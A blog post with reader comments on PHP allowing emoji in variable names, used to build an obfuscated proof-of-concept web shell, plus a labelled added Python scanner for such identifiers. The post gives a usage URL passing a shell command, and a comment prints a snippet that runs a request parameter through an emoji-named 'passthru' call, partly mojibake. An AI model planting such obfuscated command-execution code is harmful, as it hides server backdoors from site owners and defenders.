I recently came across an interesting behaviour in PHP. Apparently, PHP permits Unicode characters in variable names, so friendly emojis can be used as PHP variables.
```
<?php
$😶="Hello World!";
echo($😶);
```
Output:
```
>> Hello World!
```
Which is valid.
I thought about making a fancy example of a PHP web shell using emojis. This is made for entertainment purposes; no real advantage is gained by using an emoji webshell. It may disturb/confuse a WAF or back-end parser, but it’s not confirmed against a real-world environment.
Usage
It can be used like this:
```
https://example.com/emojis-webshell.php?👽=pwd
```
You can create a CLI for it to do more; I am only publishing it as a proof of concept.
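From the defender's side, a scanner that looks for these identifiers has to treat PHP source as bytes, because PHP accepts any byte 0x80-0xff in a name and a tool that assumes ASCII will miss or mangle them. The Python sketch below is an added example, not code from the original post; `scan_php`, the finding labels and the sample file are constructed for illustration, and the regex match is a heuristic that also fires inside strings and comments.

```python
import re

# PHP's name grammar is byte-based: any byte 0x80-0xff is a legal identifier
# character, so UTF-8 encoded emoji pass. Scan bytes, not decoded text.
IDENT = rb"[A-Za-z_\x80-\xff][A-Za-z0-9_\x80-\xff]*"
# A variable, optionally followed by "(" (a variable-function call).
VAR = re.compile(rb"\$(" + IDENT + rb")(\s*\()?")
# A request superglobal indexed with a quoted key, e.g. $_GET['key'].
REQ_KEY = re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*(['\"])(.*?)\1")


def non_ascii(raw: bytes) -> bool:
    return any(b >= 0x80 for b in raw)


def scan_php(source: bytes) -> list[tuple[int, str, str]]:
    """Return (line number, finding kind, name) for each non-ASCII identifier."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in VAR.finditer(line):
            if non_ascii(m.group(1)):
                kind = "variable-function call" if m.group(2) else "variable"
                name = m.group(1).decode("utf-8", "replace")
                findings.append((lineno, kind, name))
        for m in REQ_KEY.finditer(line):
            if non_ascii(m.group(2)):
                key = m.group(2).decode("utf-8", "replace")
                findings.append((lineno, "request key", key))
    return findings


# Constructed sample, modelled on the snippets in the post.
SAMPLE = """<?php
$greeting = "Hello World!";
$😶 = "Hello World!";
echo($😶);
if (isset($_GET['👽'])) {
    $😶($_GET['👽']);
}
""".encode("utf-8")

if __name__ == "__main__":
    for lineno, kind, name in scan_php(SAMPLE):
        print(f"line {lineno}: non-ASCII {kind}: {name}")
```

The variable-function call on a non-ASCII name fed from a request key is the combination worth triaging first; plain non-ASCII variables also occur in legitimate non-English code.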
Haha that is pretty fun. Could also break some IR tools that aren't ready to support Emoji/ASCII code.
Yeah!
I expect this too. I haven't tried it against security/incident response tools yet. I'm sure it will break the parsing of many.
Nice technique
Thanks Abdelazim!
Nice post!
May I ask a question? Why do you run an `eval` with the result of a `passthru`?
Thanks Lorenzo!
The reason is: `passthru` is a command execution function. It's obfuscated using the emojis technique discussed.
The `eval` is used to run the resulting PHP code.
I know `passthru` is a string created by concatenating the emojis. Does PHP execute the `passthru` even without the `eval` command?
@Lorenzo
Yes, PHP can execute it without `eval`.
```
if (isset($_GET['👽'])) {
$ðŸ˜($_GET['👽']);
};
```
Will work normally too.